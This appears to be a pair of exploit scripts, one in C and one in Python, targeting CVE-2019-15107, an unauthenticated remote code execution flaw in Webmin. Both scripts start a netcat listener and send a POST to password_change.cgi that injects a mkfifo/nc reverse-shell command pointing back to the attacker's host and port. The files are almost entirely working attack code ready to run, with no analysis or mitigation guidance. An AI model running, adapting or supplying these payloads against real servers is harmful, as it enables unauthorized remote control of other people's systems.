File: cve201915107.c
//
//   Exploit for Webmin servers versions 1.890 through 1.920.
//
//   CVE: 2019-15107         Unauthenticated Remote Code Execution
//
//   Author: Alberto Almansa - @Hsilyav
//

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <regex.h>
#include <curl/curl.h>
#include <unistd.h> // For execvp function

int is_valid_ip(const char *ip) {
    regex_t regex;
    int reti = regcomp(&regex, "^[0-9.]+$", REG_EXTENDED);
    if (reti) {
        fprintf(stderr, "Could not compile regex\n");
        exit(1);
    }
    reti = regexec(&regex, ip, 0, NULL, 0);
    regfree(&regex);
    return !reti;
}

int is_valid_port(int port) {
    return port >= 1 && port <= 65535;
}

int main(int argc, char *argv[]) {
    if (argc != 5) {
        fprintf(stderr, "Usage: exploit <target_host> <target_port> <LHOST> <LPORT>\n");
        return 1;
    }

    char *target_host = argv[1];
    int target_port = atoi(argv[2]);
    char *lhost = argv[3];
    int lport = atoi(argv[4]);

    if (!is_valid_ip(target_host)) {
        printf("The target_host must be a valid IP address.\n");
        return 1;
    }

    if (!is_valid_port(target_port)) {
        printf("The target_port is not in the valid range (1-65535).\n");
        return 1;
    }

    if (!is_valid_ip(lhost)) {
        printf("LHOST must be a valid IP address.\n");
        return 1;
    }

    if (!is_valid_port(lport)) {
        printf("LPORT is not in the valid range (1-65535).\n");
        return 1;
    }

    // Start netcat in listening mode on LPORT
    char lport_str[6];
    snprintf(lport_str, sizeof(lport_str), "%d", lport);
    char *nc_args[] = {"nc", "-lvnp", lport_str, NULL};
    if (fork() == 0) {
        execvp("nc", nc_args);
    }

    // Step 1: Create the "payload" text string
    char payload[256];
    snprintf(payload, sizeof(payload), "rm+/tmp/f%%3Bmkfifo+/tmp/f%%3Bcat+/tmp/f|/bin/bash+-i+2>%%261|nc+%s+%d+>/tmp/f", lhost, lport);
    
    // Step 2: Initialize libcurl
    CURL *curl;
    CURLcode res;
    curl_global_init(CURL_GLOBAL_DEFAULT);
    curl = curl_easy_init();

    if (curl) {
        // Step 3: Send the payload with libcurl and custom headers
        char url[256];
        snprintf(url, sizeof(url), "http://%s:%d/password_change.cgi", target_host, target_port);
        curl_easy_setopt(curl, CURLOPT_URL, url);
        
        struct curl_slist *headers = NULL;
        char host_header[128];
        snprintf(host_header, sizeof(host_header), "Host: %s:%d", target_host, target_port);
        headers = curl_slist_append(headers, host_header);
        headers = curl_slist_append(headers, "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0");
        headers = curl_slist_append(headers, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8");
        headers = curl_slist_append(headers, "Accept-Language: en-US,en;q=0.5");
        headers = curl_slist_append(headers, "Accept-Encoding: gzip, deflate, br");
        char referer_header[256];
        snprintf(referer_header, sizeof(referer_header), "Referer: http://%s:%d/session_login.cgi", target_host, target_port);
        headers = curl_slist_append(headers, referer_header);
        headers = curl_slist_append(headers, "Content-Type: application/x-www-form-urlencoded");

        curl_easy_setopt(curl, CURLOPT_HTTPHEADER, headers);

        char post_fields[512];
        snprintf(post_fields, sizeof(post_fields), "user=Test&pam=&expired=2&old=%s&new1=test&new2=test", payload);
        curl_easy_setopt(curl, CURLOPT_POSTFIELDS, post_fields);

        // Perform the request
        res = curl_easy_perform(curl);

        // Cleanup
        curl_slist_free_all(headers);
        curl_easy_cleanup(curl);
        curl_global_cleanup();

        if (res != CURLE_OK) {
            fprintf(stderr, "curl_easy_perform() failed: %s\n", curl_easy_strerror(res));
            return 1;
        }
    } else {
        fprintf(stderr, "Failed to initialize libcurl\n");
        return 1;
    }

    printf("\n[*] Exploit completed.\n");
    return 0;
}

File: cve201915107.py
##########################################################################
#   Exploit for Webmin server versions from 1.900 through 1.920          #
#                                                                        #
#   CVE: 2019-15107         Unauthenticated Remote Code Execution        #
#                                                                        #
#   Author: @hsilyav                                   			 #
#                                                                        #
##########################################################################

import argparse
import re
import urllib.parse
import subprocess

def is_valid_ip(ip):
    ip_pattern = r"^\d{1,3}(\.\d{1,3}){3}$"
    return re.match(ip_pattern, ip) is not None

def is_valid_port(port):
    return 1 <= port <= 65535

def main():
    parser = argparse.ArgumentParser(description="Exploit Webmin 1.920 - Unauthenticated Remote Code Execution.")
    
    parser.add_argument("target_host", help="Target IP or domain")
    parser.add_argument("target_port", type=int, help="Target port")
    parser.add_argument("LHOST", help="Your IP address (LHOST)")
    parser.add_argument("LPORT", type=int, help="Your local listening port (LPORT)")

    args = parser.parse_args()

    if not (is_valid_ip(args.target_host) or re.match(r"^[a-zA-Z0-9.-]+$", args.target_host)):
        print("The target_host must be a valid IP address or domain.")
        return

    if not is_valid_port(args.target_port):
        print("The target_port is not in the valid range (1-65535).")
        return

    if not is_valid_ip(args.LHOST):
        print("LHOST must be a valid IP address.")
        return

    if not is_valid_port(args.LPORT):
        print("LPORT is not in the valid range (1-65535).")
        return
    
    payload = f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc {args.LHOST} {args.LPORT} >/tmp/f"
    encoded_payload = urllib.parse.quote_plus(payload, safe="|>/")
        
    netcat_process = subprocess.Popen(["nc", "-l", "-p", str(args.LPORT)])
    print('\n','[*] Listening on port',args.LPORT)
        
    print('\n','[*] Sending payload: ',encoded_payload)
    print('\n')
    
    curl_command = (
        f"curl -X POST http://{args.target_host}:{args.target_port}/password_change.cgi "
        f"-H 'Host: {args.target_host}:{args.target_port}' "
        f"-H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' "
        f"-H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' "
        f"-H 'Accept-Language: en-US,en;q=0.5' "
        f"-H 'Accept-Encoding: gzip, deflate, br' "
	f"-H 'Referer: http://{args.target_host}:{args.target_port}/session_login.cgi' "
        f"-H 'Content-Type: application/x-www-form-urlencoded' "
        f"-H 'Content-Length: 139' "
        f"-H 'Origin: http://{args.target_host}:{args.target_port}' "
        f"-H 'Connection: close' "
        f"-H 'Cookie: redirect=1; testing=1; sessiontest=1' "
	f"-H 'Upgrade-Insecure-Requests: 1' "
        f"-d 'user=Test&pam=&expired=2&old={encoded_payload}&new1=test&new2=test' "
    )
    
    subprocess.run(curl_command, shell=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
        
    print('\n\n',"[*] Exploit completed.")

if __name__ == "__main__":
    main()
